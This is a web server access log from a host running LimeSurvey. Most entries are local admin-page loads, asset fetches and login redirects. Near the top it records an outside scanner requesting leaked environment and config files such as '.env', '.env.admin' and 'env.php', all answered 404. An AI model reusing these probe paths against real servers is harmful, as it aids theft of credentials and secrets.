3.145.49.236 - - [07/Nov/2025:15:41:38 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.30 - - [07/Nov/2025:15:41:39 +0300] "GET /user_panel/.env HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:40 +0300] "GET /symfony/env.php HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:41 +0300] "GET /users/.env.dist HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:42 +0300] "GET /server/.env.tmp HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:47 +0300] "GET /test/.env.admin HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:15:43:31 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:15:43:31 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:15:48:53 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:15:48:54 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:15:48:54 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:15:48:54 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:15:48:55 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:15:48:55 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:15:48:55 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:15:48:55 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
::1 - - [07/Nov/2025:15:49:51 +0300] "POST /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 302 -
::1 - - [07/Nov/2025:15:49:52 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19800
::1 - - [07/Nov/2025:15:49:53 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.woff2?t=1681573354175 HTTP/1.1" 200 139320
::1 - - [07/Nov/2025:15:49:53 +0300] "GET /limesurvey/tmp/assets/65545126/font-src/roboto-v18-latin_latin-ext/roboto-v18-latin_latin-ext-regular.woff2 HTTP/1.1" 200 21920
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/index.php/surveyAdministration/newSurvey HTTP/1.1" 302 -
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:15:50:37 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:15:50:38 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
::1 - - [07/Nov/2025:15:50:57 +0300] "GET /limesurvey/index.php/questionAdministration/create?surveyid=226469&gid=2 HTTP/1.1" 302 -
::1 - - [07/Nov/2025:15:50:57 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:15:50:58 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:15:50:59 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:15:50:59 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:15:50:59 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:15:50:59 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/index.php/surveyAdministration/newSurvey HTTP/1.1" 302 -
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:15:51:13 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:15:51:14 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
::1 - - [07/Nov/2025:15:51:25 +0300] "POST /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 302 -
::1 - - [07/Nov/2025:15:51:26 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19800
::1 - - [07/Nov/2025:15:51:26 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.woff2?t=1681573354175 HTTP/1.1" 200 139320
::1 - - [07/Nov/2025:15:51:27 +0300] "GET /limesurvey/tmp/assets/65545126/font-src/roboto-v18-latin_latin-ext/roboto-v18-latin_latin-ext-regular.woff2 HTTP/1.1" 200 21920
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:15:51:44 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
